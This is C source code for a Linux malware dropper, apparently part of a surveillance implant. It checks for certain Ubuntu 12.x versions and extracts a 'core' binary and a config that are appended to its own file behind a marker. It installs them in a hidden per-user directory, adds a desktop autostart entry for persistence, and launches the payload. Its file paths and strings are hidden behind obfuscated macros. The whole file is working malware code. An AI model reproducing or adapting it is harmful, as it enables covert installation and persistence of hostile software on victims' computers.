/*
   DROPPER FORMAT
   --------------

    [n] dropper
   [16] MARKER
   [12] TAG
    [4] i (little endian) [core size]
    [i] core
    [4] j (little endian) [config size]
    [j] config
   [16] MARKER
    [4] n (little endian) [dropper size]
*/

#define DISTRO_UNSUPPORTED        0x00
#define DISTRO_UBUNTU_12_04_X86   0x01
#define DISTRO_UBUNTU_12_04_X64   0x02
#define DISTRO_UBUNTU_12_04_1_X86 0x03
#define DISTRO_UBUNTU_12_04_1_X64 0x04
#define DISTRO_UBUNTU_12_04_2_X86 0x05
#define DISTRO_UBUNTU_12_04_2_X64 0x06
#define DISTRO_UBUNTU_12_10_X86   0x07
#define DISTRO_UBUNTU_12_10_X64   0x08

#define MARKER "BmFyY5JhOGhoZjN1"

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <fcntl.h>
#include <sys/file.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/utsname.h>

#include "so.h"

int getdistro(void);
int main(void);

int getdistro(void)
{
   int distro = DISTRO_UNSUPPORTED;
   struct utsname arch;
   FILE *fp = NULL;
   char buf[128];

   so();

   do {
      if(uname(&arch)) break;
      if((fp = fopen(so0, "r"))) {
         while(fgets(buf, sizeof(buf), fp)) {
            if(!strcmp(buf, "DISTRIB_DESCRIPTION=\"Ubuntu 12.04 LTS\"\n")) {
               distro = (strcmp(arch.machine, "x86_64") ? DISTRO_UBUNTU_12_04_X86 : DISTRO_UNSUPPORTED);
               break;
            } else if(!strcmp(buf, "DISTRIB_DESCRIPTION=\"Ubuntu 12.04.1 LTS\"\n")) {
               distro = (strcmp(arch.machine, "x86_64") ? DISTRO_UBUNTU_12_04_1_X86 : DISTRO_UNSUPPORTED);
               break;
            } else if(!strcmp(buf, "DISTRIB_DESCRIPTION=\"Ubuntu 12.04.2 LTS\"\n")) {
               distro = (strcmp(arch.machine, "x86_64") ? DISTRO_UBUNTU_12_04_2_X86 : DISTRO_UNSUPPORTED);
               break;
            } else if(!strcmp(buf, "DISTRIB_DESCRIPTION=\"Ubuntu 12.10\"\n")) {
               distro = (strcmp(arch.machine, "x86_64") ? DISTRO_UBUNTU_12_10_X86 : DISTRO_UNSUPPORTED);
               break;
            }
         }
         fclose(fp);
         if(distro != DISTRO_UNSUPPORTED) break;
      }
   } while(0);

   return distro;
}

int main(void)
{
   FILE *dropper = NULL, *core = NULL, *config = NULL, *desktop = NULL;
   char *marker = MARKER, test[sizeof(MARKER) - 1], tag[9], buf[100 * 1024], path[256], installdir[256];
   unsigned int i, size, ret = 0;
   int lock;
   pid_t pid;

   if(getdistro() == DISTRO_UNSUPPORTED) exit(EXIT_FAILURE);

   do {
      if(!(dropper = fopen(so1, "r"))) break;

      if(fseek(dropper, -((sizeof(MARKER) - 1) + sizeof(unsigned int)), SEEK_END)) break;
      if(!fread(test, sizeof(MARKER) - 1, 1, dropper)) break;
      for(i = 0; ((i < (sizeof(MARKER) - 1)) && (marker[i] == test[i])); i++);
      if(i != (sizeof(MARKER) - 1)) break; 

      if(!fread(&size, sizeof(unsigned int), 1, dropper)) break;

      if(fseek(dropper, size, SEEK_SET)) break;
      if(!fread(test, sizeof(MARKER) - 1, 1, dropper)) break;
      for(i = 0; ((i < (sizeof(MARKER) - 1)) && (marker[i] == test[i])); i++);
      if(i != (sizeof(MARKER) - 1)) break; 

      if(!fread(tag, sizeof(tag) - 1, 1, dropper)) break;
      tag[sizeof(tag) - 1] = '\0';

      if(snprintf(installdir, sizeof(installdir), so2, getuid(), tag) >= sizeof(installdir)) break;
      mkdir(installdir, 0750); 

      if(snprintf(path, sizeof(path), so3, installdir) >= sizeof(path)) break;
      if((lock = open(path, O_WRONLY|O_CREAT, 0600)) == -1) break;
      if(flock(lock, LOCK_EX|LOCK_NB)) break;
      close(lock);

      if(!fread(&size, sizeof(unsigned int), 1, dropper)) break;
      if(snprintf(path, sizeof(path), so4, installdir) >= sizeof(path)) break;
      if(!(core = fopen(path, "w"))) break;
      while(size) {
         if(!fread(buf, (size > sizeof(buf)) ? sizeof(buf) : size, 1, dropper)) break;
         if(!fwrite(buf, (size > sizeof(buf)) ? sizeof(buf) : size, 1, core)) break; 
         size -= ((size > sizeof(buf)) ? sizeof(buf) : size);
      }
      fclose(core);
      if(size) {
         unlink(path);
         break;
      }
      chmod(path, 0755);

      if(!fread(&size, sizeof(unsigned int), 1, dropper)) break;
      if(snprintf(path, sizeof(path), so5, installdir) >= sizeof(path)) break;
      if(!(config = fopen(path, "w"))) break;
      while(size) {
         if(!fread(buf, (size > sizeof(buf)) ? sizeof(buf) : size, 1, dropper)) break;
         if(!fwrite(buf, (size > sizeof(buf)) ? sizeof(buf) : size, 1, config)) break; 
         size -= ((size > sizeof(buf)) ? sizeof(buf) : size);
      }
      fclose(config);
      if(size) {
         unlink(path);
         break;
      }

      if(snprintf(path, sizeof(path), so6, getenv(so7)) >= sizeof(path)) break;
      mkdir(path, 0700);
      if(snprintf(path, sizeof(path), so8, getenv(so7)) >= sizeof(path)) break;
      mkdir(path, 0700);

      if(snprintf(path, sizeof(path), so10, getenv(so7), tag) >= sizeof(path)) break;
      if(!(desktop = fopen(path, "w"))) break;
      fprintf(desktop, so12, '\n');
      fprintf(desktop, so13, '\n');
      fprintf(desktop, so14, installdir, '\n');
      fprintf(desktop, so15, '\n');
      fprintf(desktop, so16, '\n');
      fprintf(desktop, so17, '\n');
      fclose(desktop);

      snprintf(path, sizeof(path), so4, installdir);
      if((pid = fork()) == -1) break;
      if(!pid) {
         fclose(dropper);
         execl(path, path, NULL);
      }

      ret = 1;
   } while(0);
   if(dropper) fclose(dropper);

   exit(ret ? EXIT_SUCCESS : EXIT_FAILURE);
}
